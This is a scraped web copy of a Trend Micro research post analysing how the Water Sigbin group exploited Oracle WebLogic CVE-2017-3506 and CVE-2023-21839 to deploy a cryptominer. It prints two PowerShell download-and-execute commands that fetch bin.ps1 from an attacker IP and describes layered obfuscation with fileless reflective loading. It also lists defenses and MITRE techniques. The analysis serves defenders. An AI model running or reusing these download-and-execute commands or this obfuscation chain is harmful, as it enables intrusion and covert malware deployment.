Decoding Water Sigbin’s Latest Obfuscation Tricks | Trend Micro (US)<\/title> <link href=\"https:\/\/fonts.googleapis.com\/css?family=Open+Sans:300,300i,400,400i,600\" rel=\"stylesheet\">\n<link href=\"\/\/customer.cludo.com\/css\/296\/1798\/cludo-search.min.css\" type=\"text\/css\" rel=\"stylesheet\"> <link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch.min.css\" type=\"text\/css\">\n<link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendmicro\/clientlibs\/trendmicro-core-2\/clientlibs\/header-footer.min.css\" type=\"text\/css\"> <meta property=\"og:url\" content=\"https:\/\/www.trendmicro.com\/en_us\/research\/24\/e\/decoding-8220-latest-obfuscation-tricks.html\"><br \/>\n<meta property=\"og:title\" content=\"Decoding Water Sigbin's Latest Obfuscation Tricks\"><br \/>\n<meta property=\"og:description\" content=\"Water Sigbin exploited the Oracle WebLogic vulnerabilities CVE-2017-3506 and CVE-2023-21839 to deploy a cryptocurrency miner using a PowerShell script. The threat actor also adopted new techniques to conceal its activities, making attacks harder to defend against.\"><br \/>\n<meta property=\"og:site_name\" content=\"Trend Micro\"><br \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/24\/8220-24-cover.png\"><br \/>\n<meta property=\"og:locale\" content=\"en_US\"> <meta name=\"twitter:card\" content=\"summary_large_image\"><br \/>\n<meta name=\"twitter:site\" content=\"@TrendMicro\"><br \/>\n<meta name=\"twitter:title\" content=\"Decoding Water Sigbin's Latest Obfuscation Tricks\"><br \/>\n<meta name=\"twitter:description\" content=\"Water Sigbin exploited the Oracle WebLogic vulnerabilities CVE-2017-3506 and CVE-2023-21839 to deploy a cryptocurrency miner using a PowerShell script. The threat actor also adopted new techniques to conceal its activities, making attacks harder to defend against.\"><br \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/24\/8220-24-cover.png\"> <\/head> <body class=\"articlepage page basicpage context-business\" id=\"readabilityBody\" readability=\"50.828363154407\">  <a id=\"page-scroll\" title=\"VerticalPageScroll\" href=\"javascript:jumpScroll($(this).scrollTop());\"> <span class=\"icon-chevron-up\"><\/span> <\/a>  <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"255260790\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"8.7954545454545\">\n<div class=\"article-details\" role=\"heading\" readability=\"37.136363636364\"> <span class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__display-tag\">APT & Targeted Attacks<\/p>\n<p class=\"article-details__description\">Water Sigbin (aka the 8220 Gang) exploited Oracle WebLogic vulnerabilities to deploy a cryptocurrency miner using a PowerShell script. The threat actor also adopted new techniques to conceal its activities, making attacks harder to defend against.<\/p>\n<p class=\"article-details__author-by\">By: Sunil Bharti <time class=\"article-details__date\">May 30, 2024<\/time> <span>Read time: <\/span><span class=\"eta\"><\/span> (<span class=\"words\"><\/span> words) <\/p>\n<div class=\"article-details__icons\">  <\/p>\n<div class=\"a2a_kit a2a_default_style\" data-a2a-icon-color=\"#717172\"> <a class=\"a2a_dd addthis_link\" href=\"https:\/\/www.addtoany.com\/share\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch\/resources\/img\/share-more.svg\" class=\"svg-icon\" alt=\"Share\"> <\/a> <a class=\"a2a_button_print addthis_link\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch\/resources\/img\/printer.svg\" class=\"svg-icon\" alt=\"Print\"> <\/a> <\/div>\n<p>   <\/div>\n<\/div><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-lg-8 col-lg-push-2\"> <\/p>\n<div class=\"richText\" readability=\"42.209628008753\">\n<div readability=\"30.430196936543\">\n<ul>\n<li><span class=\"rte-red-bullet\">Water Sigbin exploited the vulnerabilities CVE-2017-3506 and CVE-2023-21839 to deploy a cryptocurrency miner via a PowerShell script.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">The gang employed obfuscation techniques, such as hexadecimal encoding of URLs and using HTTP over port 443, allowing for stealthy payload delivery.<br \/><\/span><\/li>\n<li><span class=\"rte-red-bullet\">The PowerShell script and the resulting batch file involved complex encoding, using environment variables to hide malicious code within seemingly benign script components.<br \/><\/span><\/li>\n<li><span class=\"rte-red-bullet\">The group performed fileless execution by using .NET reflection techniques in PowerShell scripts, which allows the malware code to run solely in memory, avoiding disk-based detection mechanisms.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">The continuous evolution of threat actor tools, tactics, and procedures (TTPs) highlights the need for organizations to remain vigilant and adopt various cybersecurity best practices, like regular patch management, employee training, and incident response plans<\/span><\/li>\n<\/ul>\n<p>Water Sigbin (aka the 8220 Gang) is a China-based threat actor that has been active since at least 2017. It focuses on deploying cryptocurrency-mining malware, primarily in cloud-based environments and Linux servers. The group has been known to integrate vulnerability exploitation as part of its wide array of TTPs.<\/p>\n<p>In our previous discussion on the the <a href=\"https:\/\/www.trendmicro.com\/en_za\/research\/23\/e\/8220-gang-evolution-new-strategies-adapted.html\">group’s tactics<\/a>, we looked into how it operates using ever-evolving and complex methods. However, cyberthreats rarely remain stagnant, with threat actors constantly finding new ways to outsmart defenders. Recently, we\u2019ve observed the Water Sigbin using new techniques and methods to hide its activities, making the group\u2019s attacks more difficult to defend systems against.<\/p>\n<p>We found the threat actor exploiting vulnerabilities with Oracle WebLogic server <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2017-3506\">CVE-2017-3506<\/a> (a vulnerability allowing remote OS command execution) and <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2023-21839\">CVE-2023-21839<\/a> (an insecure deserialization vulnerability) to deploy a cryptocurrency miner via a PowerShell script named <i>bin.ps1<\/i> on the victim host. Upon closer examination of the group\u2019s tools, tactics and procedures (TTPs), we determined the exploitation to be the work of Water Sigbin, indicating that it is continuously updating its deployment scripts and tools.<\/p>\n<p>We observed the following attack payload for CVE-2017-3506:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/e\/decoding-the-8220-gang-latest-obfuscation-tricks\/fig1.jpg\" alt=\"Figure 1. The attack payload for CVE-2017-3506\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 1. The attack payload for CVE-2017-3506<\/figcaption><\/div>\n<\/figure><\/div>\n<div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p>The base64-encoded string in the attack payload is the following:<\/p>\n<p><span class=\"blockquote\">powershell “IEX(New-Object Net.WebClient).DownloadString(‘http:\/\/0xb9ac8092:443\/bin.ps1’)”<\/span><\/p>\n<p>Meanwhile, the attack payload for CVE-2023-21839 can be seen in Figure 2.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/e\/decoding-the-8220-gang-latest-obfuscation-tricks\/fig2.jpg\" alt=\"Figure 2. The attack payload for CVE-2023-21839\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 2. The attack payload for CVE-2023-21839<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"39.5\">\n<div readability=\"24\">\n<p>For this exploit, the base64 encoded string in attack payload is:<\/p>\n<p><span class=\"blockquote\">powershell “IEX(New-Object Net.WebClient).DownloadString(‘http:\/\/185.172.128.146:443\/bin.ps1’)”<\/span><\/p>\n<p>We found exploitation attempts in both Linux and Windows machines, with the threat actor deploying shell scripts in the former and a PowerShell script in the latter. For our analysis, we will refer to the techniques used in the Windows version of the exploitation, which shows a noteworthy obfuscation technique used by Water Sigbin.<\/p>\n<p>At the outset of payload delivery during vulnerability exploitation, the threat actor used the following techniques to evade detection:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Implementation of hexadecimal encoding for URLs:<br \/><\/span><\/li>\n<\/ul>\n<p>The URL used to download and deploy the PowerShell script is depicted in the following image:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/e\/decoding-the-8220-gang-latest-obfuscation-tricks\/fig3.jpg\" alt=\"Figure 3. Hex encoding of the URL\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 3. Hex encoding of the URL<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p>The dotted decimal notation of this URL translates to <i>http:\/\/187.172.128.146:443\/bin[.]ps1<\/i><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Employing HTTP over port 443:<br \/><\/span><\/li>\n<\/ul>\n<p>As seen in the previous URL, Water Sigbin uses HTTP on port 443 for stealthy communication.<\/p>\n<p>The <i>bin.ps1<\/i> shell script file consists of two parts:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<ol>\n<li>A lengthy base64-encoded string containing the binary code and instructions to execute it<\/li>\n<li>A function responsible for decoding the base64 string, writing the decoded contents into a file named <i>microsoft_office365.bat<\/i> in temporary directory, and silently executing it<\/li>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/e\/decoding-the-8220-gang-latest-obfuscation-tricks\/fig4a.jpg\" alt=\"Figure 4. Content of bin.ps1 PowerShell script\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 4. Content of bin.ps1 PowerShell script<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p>The base64-encoded content decoded by the <i>Convert-Base64ToFileAndExecuteSilently<\/i> function in the <i>bin.ps1<\/i> file reveals the core script elements. This decoded content is then written to the temporary directory under the file name <i>microsoft_office365.bat<\/i>.<\/p>\n<h2><span class=\"body-subhead-title\">Analysis of microsoft_office365.bat<\/span><\/h2>\n<p>The <i>microsoft_office365.bat<\/i> script employs environment variables to obfuscate the original script code, making it seem complex and confusing. The script commences with the following code:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/e\/decoding-the-8220-gang-latest-obfuscation-tricks\/fig5.jpg\" alt=\"Figure 5. Initial code of the script \u201cmicrosoft_office365.bat\u201d\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 5. Initial code of the script \u201cmicrosoft_office365.bat\u201d<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"35.5\">\n<div readability=\"16\">\n<p>While examining the script, we observed that it seems like environment variables are being set, which seem like unreadable or gibberish data. However, after thorough analysis, it seems like the threat actors managed to implement a very effective method to hide their malicious code.<\/p>\n<p>To get the actual code, we need to decode the first \u201cif\u201d condition: <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/e\/decoding-the-8220-gang-latest-obfuscation-tricks\/fig6.jpg\" alt=\"Figure 6. If condition in \u201cmicrosoft_office365.bat\u201d\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 6. If condition in \u201cmicrosoft_office365.bat\u201d<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>Next, we need to replace <i>RxEGj<\/i> with empty (\u201c\u201d) in every part of the code. After doing this, the first part of the script will look like the following:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/e\/decoding-the-8220-gang-latest-obfuscation-tricks\/fig7.jpg\" alt=\"Figure 7. Decoded first part of the script\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 7. Decoded first part of the script<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"35.309139784946\">\n<div readability=\"15.913978494624\">\n<p>The initial command <i>cmd \/c “set __=&rem\u201d <\/i>runs a new command prompt and sets the \u201c__\u201d environment variable to an empty string and then executes the <a href=\"https:\/\/home.csulb.edu\/~murdock\/rem.html#:~:text=Purpose%3A%20Provides%20a%20way%20to,on)%20into%20a%20batch%20file.&text=During%20execution%20of%20a%20batch,space%2C%20tab%2C%20and%20comma.\"><i>rem<\/i><\/a> (records comments in a batch file) command, which does nothing. Overall, the script section appears to be designed to start a new command prompt window in minimized mode and then exit the current script.<\/p>\n<p>The next two lengthy lines of base64-encoded content contains the actual binary code, requiring processing before it can be utilized. The attacker employs PowerShell methods for this processing.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/e\/decoding-the-8220-gang-latest-obfuscation-tricks\/fig8.jpg\" alt=\"Figure 8. Encoded malicious binary code\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 8. Encoded malicious binary code<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p>The next section contains obfuscated PowerShell code, which does all the processing on the base64-encoded string for further usage.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a class=\"bs-modal\" id=\"643b30\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/e\/decoding-the-8220-gang-latest-obfuscation-tricks\/fig9.jpg\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/e\/decoding-the-8220-gang-latest-obfuscation-tricks\/fig9.jpg\" alt=\"Figure 9. Obfuscated PowerShell code\"> <\/a> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 9. Obfuscated PowerShell code<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>Similarly, if we deobfuscate the remaining section by replacing <i>RxEGj <\/i>with an empty string (“”), we will obtain the actual PowerShell code:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a class=\"bs-modal\" id=\"3971d7\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/e\/decoding-the-8220-gang-latest-obfuscation-tricks\/fig10.jpg\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/e\/decoding-the-8220-gang-latest-obfuscation-tricks\/fig10.jpg\" alt=\"Figure 10. Decoded PowerShell code\"> <\/a> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 10. Decoded PowerShell code<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"44.44480620155\">\n<div readability=\"33.957829457364\">\n<p>This PowerShell command performs the following actions:<\/p>\n<ol>\n<li>Decodes the base64 string <i>([Convert]::FromBase64String)<\/i><\/li>\n<li>Performs decryption <i>([System.Security.Cryptography.Aes])<\/i> of the very long string<\/li>\n<li>Decompresses the decrypted string <i>([IO.Compression.CompressionMode])<\/i><\/li>\n<li>Executes the malware code using DotNet in memory reflection <i>([System.Reflection.Assembly])<\/i><\/li>\n<\/ol>\n<p>By leveraging “System.Reflection.Assembly,” the attacker orchestrates a fileless execution strategy, ensuring that all operations occur solely in memory.<\/p>\n<p>The Water Sigbin’s activities involving the exploitation of CVE-2017-3506 and CVE-2023-21839 underscore the adaptability of modern threat actors. The use of sophisticated obfuscation techniques such as hexadecimal encoding of URLs, complex encoding within PowerShell and batch scripts, use of environment variables, and layered obfuscation to conceal malicious code within seemingly benign scripts demonstrates that Water Sigbin is a threat actor that can capably hide its tracks, making detection and prevention more challenging for security teams.<\/p>\n<p>These evolving tactics signify a need for constant vigilance and proactive countermeasures to safeguard systems and networks against sophisticated threats.<\/p>\n<p>To effectively protect systems and networks against vulnerability exploitation such as those carried out by the Water Sigbin, organizations can implement a variety of cybersecurity best practices and proactive defense measures. Here are some recommendations:<\/p>\n<ol>\n<li><b>Patch management<\/b>. Prioritize regular updates and patch management processes to ensure that all systems are running the latest software versions. Quickly apply security patches for known vulnerabilities, especially those with publicly available exploits.<\/li>\n<li><b>Network segmentation<\/b>. Use network segmentation to reduce the attack surface. By separating critical network segments from the larger network, the impact of a potential vulnerability exploitation can be minimized,<\/li>\n<li><b>Regular security audits<\/b>. Conduct security audits and vulnerability assessments regularly to identify and remediate potential weaknesses within the infrastructure before they can be exploited.<\/li>\n<li><b>Security awareness training<\/b>. Educate employees about the common tactics used by attackers so they can recognize and avoid falling victim to social engineering attacks that might precede vulnerability exploitation.<\/li>\n<li><b>Incident response plan<\/b>. Develop, test, and maintain an incident response plan so your organization can respond quickly and effectively to any security breaches or vulnerability exploitations.<\/li>\n<li><b>Threat intelligence<\/b>. Subscribe to threat intelligence feeds to stay informed about the latest threats and tactics used by threat actors and advanced persistent threat (APT) groups.<\/li>\n<\/ol>\n<p>The following protections exist to detect malicious activity and shield Trend customers against the exploitation of the vulnerabilities discussed in this blog entry:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">1011716 – Oracle Weblogic Server Insecure Deserialization Vulnerability (CVE-2023-21839)<\/span><\/li>\n<li><span class=\"rte-red-bullet\">1010550 – Oracle WebLogic WLS Security Component Remote Code Execution Vulnerability (CVE-2017-3506)<\/span><\/li>\n<\/ul>\n<p>The indicators of compromise for this entry can be found <a href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/e\/decoding-the-8220-gang-latest-obfuscation-tricks\/decoding-the-8220-gangs-latest-obfuscation-tricks.txt\">here<\/a>.<\/p>\n<p><span class=\"body-subhead-title\">MITRE ATT&CK <\/span><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\">\n<table cellpadding=\"1\" cellspacing=\"0\" border=\"1\" width=\"100%\" height=\"10%\">\n<tbody readability=\"8\">\n<tr>\n<th scope=\"col\"><b> Tactic<\/b><\/th>\n<th scope=\"col\"><b>Technique<\/b><\/th>\n<th scope=\"col\"><b>Technique ID<\/b><\/th>\n<\/tr>\n<tr readability=\"2\">\n<td height=\"17\" width=\"154\">Initial Access <\/td>\n<td width=\"154\">Exploit Public-Facing Application<\/td>\n<td width=\"154\">T1190<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td height=\"17\" width=\"154\">Execution <\/td>\n<td width=\"154\">Command and Scripting Interpreter: PowerShell <\/td>\n<td width=\"154\">T1059.001 <\/td>\n<\/tr>\n<tr readability=\"2\">\n<td rowspan=\"5\" height=\"85\" width=\"154\">Defense Evasion<\/td>\n<td width=\"154\">Deobfuscate\/Decode Files or Information<\/td>\n<td width=\"154\">T1140 <\/td>\n<\/tr>\n<tr readability=\"2\">\n<td height=\"17\" width=\"154\">Obfuscated Files or Information: Command Obfuscation <\/td>\n<td width=\"154\">T1027.010<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td height=\"17\" width=\"154\">Hide Artifacts: Hidden Window<\/td>\n<td width=\"154\">T1564.003<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td height=\"17\" width=\"154\">Process Injection: Portable Executable Injection<\/td>\n<td width=\"154\">T1055.002<\/td>\n<\/tr>\n<tr>\n<td height=\"17\" width=\"154\">Reflective Code Loading<\/td>\n<td width=\"154\">T1620<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td rowspan=\"3\" height=\"51\" width=\"154\">Command and Control<\/td>\n<td width=\"154\">Data Encoding: Standard Encoding <\/td>\n<td width=\"154\">T1132.001 <\/td>\n<\/tr>\n<tr readability=\"2\">\n<td height=\"17\" width=\"154\">Application Layer Protocol: Web Protocols <\/td>\n<td width=\"154\">T1071.001 <\/td>\n<\/tr>\n<tr>\n<td height=\"17\" width=\"154\">Ingress Tool Transfer<\/td>\n<td width=\"154\">T1105<\/td>\n<\/tr>\n<\/tbody>\n<\/table><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<section class=\"tag--list\">\n<p>Tags<\/p>\n<\/section>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p>   <\/p>\n<p> <span>sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk<\/span> <\/p>\n<p>  <\/body> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/24\/e\/decoding-8220-latest-obfuscation-tricks.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Water Sigbin (aka the 8220 Gang) exploited the Oracle WebLogic vulnerabilities CVE-2017-3506 and CVE-2023-21839 to deploy a cryptocurrency miner using a PowerShell script. The threat actor also adopted new techniques to conceal its activities, making attacks harder to defend against. Read More HERE…<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9546,9510,9520,9508,9555,9516,9509],"class_list":["post-56188","post","type-post","status-publish","format-standard","hentry","category-trendmicro","tag-trend-micro-research-apttargeted-attacks","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-cloud","tag-trend-micro-research-endpoints","tag-trend-micro-research-exploitsvulnerabilities","tag-trend-micro-research-reports","tag-trend-micro-research-research"],"yoast_head":"\n<title>Decoding Water Sigbin's Latest Obfuscation Tricks 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Decoding Water Sigbin's Latest Obfuscation Tricks 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2024-05-30T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/8220-24-cover:Large?qlt=80\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decoding-water-sigbins-latest-obfuscation-tricks\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decoding-water-sigbins-latest-obfuscation-tricks\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Decoding Water Sigbin’s Latest Obfuscation Tricks\",\"datePublished\":\"2024-05-30T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decoding-water-sigbins-latest-obfuscation-tricks\\\/\"},\"wordCount\":1486,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decoding-water-sigbins-latest-obfuscation-tricks\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/8220-24-cover:Large?qlt=80\",\"keywords\":[\"Trend Micro Research : APT&Targeted Attacks\",\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Cloud\",\"Trend Micro Research : Endpoints\",\"Trend Micro Research : Exploits&Vulnerabilities\",\"Trend Micro Research : Reports\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decoding-water-sigbins-latest-obfuscation-tricks\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decoding-water-sigbins-latest-obfuscation-tricks\\\/\",\"name\":\"Decoding Water Sigbin's Latest Obfuscation Tricks 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decoding-water-sigbins-latest-obfuscation-tricks\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decoding-water-sigbins-latest-obfuscation-tricks\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/8220-24-cover:Large?qlt=80\",\"datePublished\":\"2024-05-30T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decoding-water-sigbins-latest-obfuscation-tricks\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decoding-water-sigbins-latest-obfuscation-tricks\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decoding-water-sigbins-latest-obfuscation-tricks\\\/#primaryimage\",\"url\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/8220-24-cover:Large?qlt=80\",\"contentUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/8220-24-cover:Large?qlt=80\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decoding-water-sigbins-latest-obfuscation-tricks\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : APT&Targeted Attacks\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-apttargeted-attacks\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Decoding Water Sigbin’s Latest Obfuscation Tricks\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 